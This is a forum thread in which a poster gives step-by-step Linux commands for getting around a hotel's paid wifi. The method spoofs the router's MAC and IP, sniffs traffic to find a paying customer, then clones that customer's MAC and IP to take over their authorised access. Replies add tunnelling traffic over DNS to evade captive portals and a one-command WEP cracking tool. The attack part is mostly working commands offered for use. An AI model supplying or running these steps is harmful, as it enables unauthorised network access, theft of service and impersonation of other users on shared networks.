Getting Free Wifi

[tully]

###############
##Getting Free Wifi##
##############

Say your at a hotel and they want to charge you 10 bux on top of the 200 dollars they already charge you to sleep there. Bullshit right? Here's how to bypass all of the fucktardery they have put in place.

Imagine you want to get into a nightclub, the bouncer says your not on the list. So you become the bouncer and figure out who can get in. Then you become someone who can get in and the bouncer lets you right through.

You need to become the access point (bouncer) to view the mac addresses (the list) of those that are associated on the network. You do this by tricking the clients that you are the router. But to become the router you need the routers credentials. To get them associate with the router. You'll notice that you cannot "talk" to anyone but the router. Lets fix that by becoming it. You can view the default gateway, or router, by typing in ifconfig once your associated. Now you need the mac address. Its stored in your arp cache. so type in arp -a and match up the default gateway with the mac address of the router. Easy shit. Lets say that our default gateway is 192.168.1.1 which is the most popular, and the mac of the router is 00:11:22:33:44:55. Lets become whats meant to keep us out.

For broadcom

Code: [Select]

ifconfig eth0 down
ifconfig et0 hw ether 00:11:22:33:44:55
ifconfig eth0 192.168.1.1
ifconfig eth0 up
For atheros

Code: [Select]

wlanconfig ath0 destroy
macchanger --mac 00:11:22:33:44:55
wlanconfig ath0 create wlandev wifi0 wlanmode managed
ifconfig ath0 up
now we run tcpdump -i (your iface eth0/ath0). You should be watching for traffic from a paid customer, mainly http traffic. Once you gather that a paid customer is on the network hit ctrl+c to stop sniffing. Now since the clients were talking to you their creds are stored in your arp cache as well. Type in arp -a to view their ip address and their mac address. Thats easy too. Lets become someone on "the list". Say clientR has the creds of 192.168.1.103 and a mac of AA:BB:CC:DD:EE:FF.

For Broadcom

Code: [Select]

ifconfig eth0 down
ifconfig eth0 hw ether AA:BB:CC:DD:EE:FF
ifconfig eth0 192.168.1.103
ifconfig eth0 up
For Atheros

Code: [Select]

wlanconfig ath0 destroy
macchanger --mac AA:BB:CC:DD:EE:FF
wlanconfig ath0 create wlandev wifi0 wlanmode managed
ifconfig ath0 192.168.1.103
ifconfig ath0 up
If all went well you should be on the interwebz

Troubleshooting:

If for some reason you lost your default gateway at the end you can try these 2 commands

route add default 192.168.1.1

or

route add default gw 192.168.1.1

Maybe your nameservers got fuxored, try

cat etc/resolv.conf

if there is nothing there then run this command

echo "nameserver 192.168.1.1" > /etc/resolv.conf

other than that I CLEARLY HAVE NO IDEA WHAT I'M TALKING ABOUT, EVER. wtf to tell you, if you cant spoof your mac try 'man ifconfig' or google what your nic is and how to spoof the mac

Hope you found this interesting/educational

~Tully

[Godot]

Also, on that note, many wifi hotspots allow anything on UDP port 53. This is supposed to be DNS, but I keep an OpenVPN server listening on UDP 53, and connect to it at hotspots. As a bonus, it also encrypts my traffic. It was really useful when my I exceeded my ISP's bandwidth cap. They blocked everything on my computer except for DNS and HTTP, and HTTP was sent through a transparent proxy which didn't work at all with HTTPS and also seemed to block certain sites at random.

Smarter hotspots force you to use their caching DNS servers, but if you want to tunnel out from these locations and don't mind painfully slow connections, google OzymanDNS. It passes traffic back and forth through the domain name system as normal DNS lookups.

[mr_doc]

Or memorize IP addresses so you don't need DNS

[Jo Nathen]

Good post tully.

[Derek Xero]

Where do I enter these command lines?


*I'm new to programming, don't flame me please.*

[Godot]

Where do I enter these command lines?

In your favorite Linux disto, open a terminal and enter "sudo su" to get root access, enter you password if it asks, then enter these commands.

[afreak]

If you don't want to use Linux full time, just look into using a USB key with your laptop with a pre-installed boot image.

[judasiscariot]

Another good way to get free wifi is to load up BT3 (4 is still in beta) and just type 'wesside-ng [wlan]'.  That utility is an all in one command wep cracking utility that takes care of all the spoofing and injection for you.